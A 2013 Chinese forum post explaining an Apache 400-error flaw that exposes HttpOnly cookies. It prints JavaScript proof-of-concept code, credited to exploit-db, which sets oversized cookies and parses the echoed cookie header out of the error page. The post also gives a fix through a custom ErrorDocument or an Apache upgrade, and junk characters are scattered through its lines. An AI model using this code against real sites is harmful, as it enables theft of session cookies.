很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。* }$ x: _& E: S7 j- m
# p" m3 P, P2 |用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:$ p: {6 I. Y5 v, e% q- y2 ?" f
/ Y: p ^6 S( N) H# h( u
; P! B7 }; A. Q+ j* U, q
// http://www.exploit-db.com/exploits/18442/5 s) t6 R. j- E7 i% [
function setCookies (good) {
( R- N3 _/ O. W" ~+ F// Construct string for cookie value
& i3 n0 r4 C6 @% r4 F! Nvar str = "";
6 n4 `+ y' u" s1 nfor (var i=0; i< 819; i++) {
% ]( s# [- }9 cstr += "x";" n! I: H4 ~) M0 }7 x
}
6 q- f6 d$ h7 n// Set cookies
! G( F0 z4 Z$ t% n" R7 Ifor (i = 0; i < 10; i++) {
' q m) H' }, q4 Z! w" X$ }// Expire evil cookie
! k( k5 D1 H3 S% H9 eif (good) {
, W* n% X4 W. h/ ^& V1 m- Kvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";5 ?9 E9 z$ U) }% f* S
}1 P( h2 n2 V* m) J
// Set evil cookie/ m4 k1 z! p5 M' R
else {
2 n" B/ K6 ?. b+ t/ Zvar cookie = "xss"+i+"="+str+";path=/";
8 j8 o0 g5 _$ h}9 N* g o9 v" k1 j0 c$ e8 Y
document.cookie = cookie;0 } h1 n* U) d6 }9 I
}
& M5 W" @0 W ~; A4 Y}
- z0 a! j l) j: ~function makeRequest() {
6 X8 J0 }6 K+ h2 @setCookies();* P" _+ `; v( {9 a2 p4 Z, ]
function parseCookies () {5 h( F8 W6 {6 |' }# @
var cookie_dict = {};
: e2 w j+ e" A* q// Only react on 400 status
2 n1 Z: S+ E' Bif (xhr.readyState === 4 && xhr.status === 400) {
l" o( w U! {, _// Replace newlines and match <pre> content, c7 `+ u! {/ P# j
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);$ y3 M, C. m" k$ \" O1 E' j3 U
if (content.length) {6 h1 r8 S/ A3 z, Z+ A+ Q- A
// Remove Cookie: prefix
$ M) I3 N6 F2 a" Scontent = content[1].replace("Cookie: ", "");; `5 V) F! c6 G: S4 M1 X' R+ ?
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
3 A7 N; ]! v, X y3 i \" N// Add cookies to object- Z5 t4 {; X: E$ ~
for (var i=0; i<cookies.length; i++) {5 q# Q; n5 y# G5 z. N1 a D3 U* T% h2 {
var s_c = cookies.split('=',2);) @' p; o0 ^) D
cookie_dict[s_c[0]] = s_c[1];
J: F. R3 j' R. U2 Q2 `}
3 _, F9 m% I1 u. ^2 O0 Y# Y}5 G. D! r: J- ?* J
// Unset malicious cookies
" c# ?3 R) k, qsetCookies(true);
* t# Y0 H! e+ A P Ialert(JSON.stringify(cookie_dict));+ B$ ]+ U. ^: n) b* B
}
, ^8 a8 @3 u! b8 h) i}
+ ?1 F# v( M9 @$ m// Make XHR request
0 C1 t. B3 V+ E4 e$ _& a. Nvar xhr = new XMLHttpRequest();
& X: E1 a6 y/ K+ P& |xhr.onreadystatechange = parseCookies;- a: L7 l. [6 u i3 `
xhr.open("GET", "/", true);
& r: _9 L" |( F/ m* t2 gxhr.send(null);
+ e3 J9 P. w% x, C) D6 N5 D9 {}
6 w# ?6 n8 o. umakeRequest();
) {% j0 [/ ]/ F( u
6 s9 a6 x* I, {1 u你就能看见华丽丽的400错误包含着cookie信息。
+ m5 N$ V0 I& N- J8 B8 C9 O3 d" `
& y6 [4 j) ?0 R下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#, O, C9 Q/ j( I' q$ J% k
) W' r# u7 r+ \修复方案:
! w! f0 u7 H; S
# {. W" T0 N0 A: J# ^) _# }% QApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
, b6 h* Q5 |1 d! t* B% r, a) v. C
In the event of a problem or error, Apachecan be configured to do one of four things,
! U; V' c+ G$ j+ b i+ V" [$ F9 x; H
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
( C0 ~) _# ?" q8 z2. output acustomized message输出一段信息
6 r+ w6 \1 M( B+ G+ ]3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 " Z' m0 y2 ?. ^: ?3 Y! Z( M% f0 | U
4. redirect to an external URL to handle theproblem/error转向一个外部URL
( `# M- F7 ^9 Q1 W7 V5 B
|3 x3 V4 Q4 l& t+ Y3 f经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容+ O# m6 I, \- F/ b
W9 m; y3 |9 V$ M
Apache配置:- `6 k0 ^, W1 x3 p: y
" A; H) \& j' \) G+ v- V( g9 t
ErrorDocument400 " security test"4 n0 D" @0 J% Z9 {" r
' F! g. g7 [) H8 ?2 a2 ^
当然,升级apache到最新也可:)。; q2 R( B( l# b/ j( l ]% }
0 T+ {. d8 H7 L; {
参考:http://httpd.apache.org/security/vulnerabilities_22.html& Z" z4 D* `5 Q) A. X0 M ^
4 B6 L0 v- `6 F* L8 A7 l q: b |
发表于 2013-4-19 19:15:43
收藏
支持
反对